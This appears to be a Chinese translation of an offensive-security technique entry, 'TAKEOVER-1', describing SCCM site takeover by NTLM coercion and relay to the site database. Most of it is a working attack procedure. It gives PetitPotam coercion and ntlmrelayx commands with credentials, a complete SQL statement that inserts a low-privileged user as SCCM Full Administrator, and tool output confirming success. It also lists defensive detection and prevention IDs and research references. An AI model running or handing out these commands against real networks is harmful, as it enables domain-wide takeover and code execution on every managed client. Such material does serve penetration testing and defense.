MITRE ATT&CK TTP
TA0008——横向移动
TA0004 - 权限提升
要求
站点数据库未托管在强制目标上
强迫
有效的 Active Directory 域凭据
与强制目标上的 SMB (TCP/445) 的连接:
TAKEOVER-1.1:强制主站点服务器
TAKEOVER-1.2:强制短信提供商
TAKEOVER-1.3:强制被动站点服务器
从强制目标到中继服务器上的 SMB (TCP/445) 的连接
强制目标设置:
BlockNTLM=0或不存在,或 =1且BlockNTLMServerExceptionList包含攻击者中继服务器 [默认]
RestrictSendingNTLMTraffic= 0、1、 或不存在,或 =2且ClientAllowedNTLMServers包含攻击者中继服务器 [默认]
域计算机帐户不在Protected Users[DEFAULT]
域控制器设置:
RestrictNTLMInDomain=0或不存在,或者配置任意值且DCAllowedNTLMServers包含强制目标 [DEFAULT]
中继
从中继服务器到中继目标上的 MSSQL (TCP/1433) 的连接,即站点数据库
站点数据库不需要身份验证的扩展保护 [默认]
域控制器设置:
RestrictNTLMInDomain=0或不存在,或者配置任意值且DCAllowedNTLMServers包含中继目标 [默认]
LmCompatibilityLevel<5或不存在,或者 =5且 LmCompatibilityLevel >=3强制目标 [默认]
概括
默认情况下,主站点服务器(包括 CAS 站点服务器)、托管 SMS 提供程序角色的系统和被动站点服务器的 Active Directory 域计算机帐户db_owner在其各自站点的 MSSQL 数据库中被授予该角色。能够成功从其中一个帐户强制执行 NTLM 身份验证并将其中继到站点数据库的攻击者可以使用这些权限向任意域帐户授予 SCCM“完全管理员”角色。
影响
“完全管理员”安全角色被授予 Configuration Manager 中所有范围和所有集合的所有权限。具有此权限的攻击者可以在任何以 SYSTEM、当前登录用户或下次登录时以特定用户身份在线的客户端设备上执行任意程序。他们还可以利用 CMPivot 和 Run Script 等工具,使用 SMS 提供程序上的 AdminService 或 WMI 实时查询或执行客户端设备上的脚本。
防御性身份证
DETECT-1:监视从其他源进行身份验证的站点服务器域计算机帐户
https://github.com/subat0mik/Misconfiguration-Manager/blob/main/defense-techniques/DETECT/DETECT-1/detect-1_description.md
PREVENT-14:要求 AD CS 和站点数据库上有 EPA
https://github.com/subat0mik/Misconfiguration-Manager/blob/main/defense-techniques/PREVENT/PREVENT-14/prevent-14_description.md
PREVENT-20:阻止与站点系统的不必要的连接
https://github.com/subat0mik/Misconfiguration-Manager/blob/main/defense-techniques/PREVENT/PREVENT-20/prevent-20_description.md
子技术
TAKEOVER-1.1:强制主站点服务器
TAKEOVER-1.2:强制短信提供商
TAKEOVER-1.3:强制被动站点服务器
示例
执行 TAKEOVER-1.1 到 TAKEOVER-1.3 的步骤相同,只是强制进行 NTLM 身份验证的系统不同。
1、(Linux)用于sccmhunter获取您想要在 SCCM 中授予完全管理员角色的 Active Directory 用户的十六进制格式的 SID,以及向用户授予角色所需的 MSSQL 语句:
$ python3 sccmhunter.py mssql -dc-ip 192.168.57.100 -d MAYYHEM.LOCAL -u 'lowpriv' -p 'P@ssw0rd' -debug -tu lowpriv -sc ps1 -stacked
[13:13:33] DEBUG [+] Bind successful ldap://192.168.57.100:389 - cleartext
[13:13:33] INFO [*] Resolving lowpriv SID...
[13:13:33] DEBUG [+] Found lowpriv SID: S-1-5-21-622943703-4251214699-2177406285-1112
[13:13:33] INFO [*] Converted lowpriv SID to 0x010500000000000515000000D75D21256B6364FD4D95C88158040000
[13:13:33] DEBUG [+] Found domain netbiosname: MAYYHEM
[13:13:33] INFO [*] Use the following to add lowpriv as a Site Server Admin.
USE CM_ps1; INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (0x010500000000000515000000D75D21256B6364FD4D95C88158040000,'MAYYHEM\lowpriv',0,0,'','','','','ps1');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'MAYYHEM\lowpriv'),'SMS0001R','SMS00ALL','29');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'MAYYHEM\lowpriv'),'SMS0001R','SMS00001','1'); INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'MAYYHEM\lowpriv'),'SMS0001R','SMS00004','1');(Windows)用于SharpSCCM获取您想要在 SCCM 中授予完全管理员角色的 Active Directory 用户的十六进制格式的 SID,并根据sccmhunter上面示例命令的输出组装查询,在适当的地方替换用户 SID、域和站点代码(ps1在此示例中)。
> .\SharpSCCM.exe local user-sid
[+] Current user: MAYYHEM\lowpriv
[+] Active Directory SID for current user: S-1-5-21-622943703-4251214699-2177406285-1112
[+] Active Directory SID (hex): 0x010500000000000515000000D75D21256B6364FD4D95C88158040000
[+] Completed execution in 00:00:00.19596102、在攻击者中继服务器上,启动ntlmrelayx,使用上一步组装的 SQL 语句瞄准站点数据库服务器的 IP 地址和 MSSQL 服务:
# impacket-ntlmrelayx -smb2support -ts -ip <NTLMRELAYX_LISTENER_IP> -t mssql://<SITE_DATABASE_IP> -q "USE CM_ps1; INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (0x010500000000000515000000D75D21256B6364FD4D95C88158040000,'MAYYHEM\lowpriv',0,0,'','','','','ps1');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'MAYYHEM\lowpriv'),'SMS0001R','SMS00ALL','29');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'MAYYHEM\lowpriv'),'SMS0001R','SMS00001','1'); INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'MAYYHEM\lowpriv'),'SMS0001R','SMS00004','1');"
Impacket v0.11.0 - Copyright 2023 Fortra
[2024-02-22 16:37:11] [*] Protocol Client MSSQL loaded..
[2024-02-22 16:37:11] [*] Protocol Client LDAPS loaded..
[2024-02-22 16:37:11] [*] Protocol Client LDAP loaded..
[2024-02-22 16:37:11] [*] Protocol Client RPC loaded..
[2024-02-22 16:37:11] [*] Protocol Client HTTPS loaded..
[2024-02-22 16:37:11] [*] Protocol Client HTTP loaded..
[2024-02-22 16:37:11] [*] Protocol Client IMAP loaded..
[2024-02-22 16:37:11] [*] Protocol Client IMAPS loaded..
[2024-02-22 16:37:11] [*] Protocol Client SMTP loaded..
[2024-02-22 16:37:11] [*] Protocol Client SMB loaded..
[2024-02-22 16:37:11] [*] Protocol Client DCSYNC loaded..
[2024-02-22 16:37:11] [*] Running in relay mode to single host
[2024-02-22 16:37:11] [*] Setting up SMB Server
[2024-02-22 16:37:11] [*] Setting up HTTP Server on port 80
[2024-02-22 16:37:11] [*] Setting up WCF Server
[2024-02-22 16:37:11] [*] Setting up RAW Server on port 6666
[2024-02-22 16:37:11] [*] Servers started, waiting for connections3、从攻击者主机,通过 SMB 强制从站点服务器进行 NTLM 身份验证,目标是中继服务器的 IP 地址:
# python3 PetitPotam.py -d MAYYHEM.LOCAL -u lowpriv -p P@ssw0rd <NTLMRELAYX_LISTENER_IP> <SITE_SERVER_IP>
Trying pipe lsarpc
[-] Connecting to ncacn_np:192.168.57.50[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!几秒钟后,您应该在中继服务器上收到一个 SMB 连接,该连接被转发到站点数据库服务器以执行 SQL 语句:
[2024-02-22 16:37:17] [*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.57.50, attacking target mssql://192.168.57.51
[2024-02-22 16:37:17] [*] Authenticating against mssql://192.168.57.51 as MAYYHEM/SITE-SERVER$ SUCCEED
[2024-02-22 16:37:17] [*] Executing SQL: USE CM_ps1; INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (0x010500000000000515000000D75D21256B6364FD4D95C88158040000,'MAYYHEM\lowpriv',0,0,'','','','','ps1');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'MAYYHEM\lowpriv'),'SMS0001R','SMS00ALL','29');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'MAYYHEM\lowpriv'),'SMS0001R','SMS00001','1'); INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'MAYYHEM\lowpriv'),'SMS0001R','SMS00004','1');
[2024-02-22 16:37:17] [*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.57.50 controlled, but there are no more targets left!
[2024-02-22 16:37:17] [*] ENVCHANGE(DATABASE): Old Value: master, New Value: CM_PS1
[2024-02-22 16:37:17] [*] INFO(SITE-DB): Line 1: Changed database context to 'CM_PS1'.$ python3 sccmhunter.py admin -u lowpriv -p <PASSWORD> -ip SITE-SMS
[15:36:54] INFO [!] Enter help for extra shell commands
() (C:\) >> show_admins
[15:37:43] INFO Tasked SCCM to list current SMS Admins.
[15:37:44] INFO Current Full Admin Users:
[15:37:44] INFO MAYYHEM\sccmadmin
[15:37:44] INFO MAYYHEM\lowpriv在 Windows 上,使用SharpSCCM:
> .\SharpSCCM.exe get users -n lowpriv -sms SITE-SMS -sc ps1
[+] Connecting to \\SITE-SMS\root\SMS\site_ps1
[+] Executing WQL query: SELECT * FROM SMS_R_User WHERE UniqueUserName LIKE '%lowpriv%'
-----------------------------------
SMS_R_User
-----------------------------------
AADTenantID:
AADUserID:
ADObjectCreationTime: 20230721132400.000000+***
AgentName: SMS_AD_USER_DISCOVERY_AGENT, SMS_AD_SECURITY_GROUP_DISCOVERY_AGENT
AgentSite: PS1, PS1
AgentTime: 20230721202501.000000+***, 20230803202502.000000+***
CloudUserId:
CreationDate: 20230721202502.760000+***
DistinguishedName: CN=Low Priv,CN=Users,DC=MAYYHEM,DC=LOCAL
FullDomainName: MAYYHEM.LOCAL
FullUserName: Low Priv
Mail:
Name: MAYYHEM\lowpriv (Low Priv)
NetworkOperatingSystem: Windows NT
ObjectGUID: Can't display UInt8 as a String
PrimaryGroupID: 513
ResourceId: 2063597571
ResourceType: 4
SecurityGroupName: MAYYHEM\Domain Users
SID: S-1-5-21-622943703-4251214699-2177406285-1112
UniqueUserName: MAYYHEM\lowpriv
UserAccountControl: 66048
UserContainerName: MAYYHEM\USERS
UserGroupName: MAYYHEM\Domain Users
UserName: lowpriv
UserOUName:
UserPrincipalName: lowpriv@MAYYHEM.LOCAL
WindowsNTDomain: MAYYHEM
-----------------------------------
[+] Completed execution in 00:00:00.9878140参考
Chris Thompson,通过自动客户端推送安装进行 SCCM 站点接管
https://posts.specterops.io/sccm-site-takeover-via-automatic-client-push-installation-f567ec80d5b1
Chris Thompson,SCCM 层次结构接管:一个站点统治所有站点
https://posts.specterops.io/sccm-hierarchy-takeover-41929c61e087
Garrett Foster,SCCM 层次结构接管,具有高可用性
https://posts.specterops.io/sccm-hierarchy-takeover-with-high-availability-7dcbd3696b43
加勒特·福斯特,sccmhunter
https://github.com/garrettfoster13/sccmhunter
克里斯·汤普森,SharpSCCM
https://github.com/Mayyhem/SharpSCCM
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
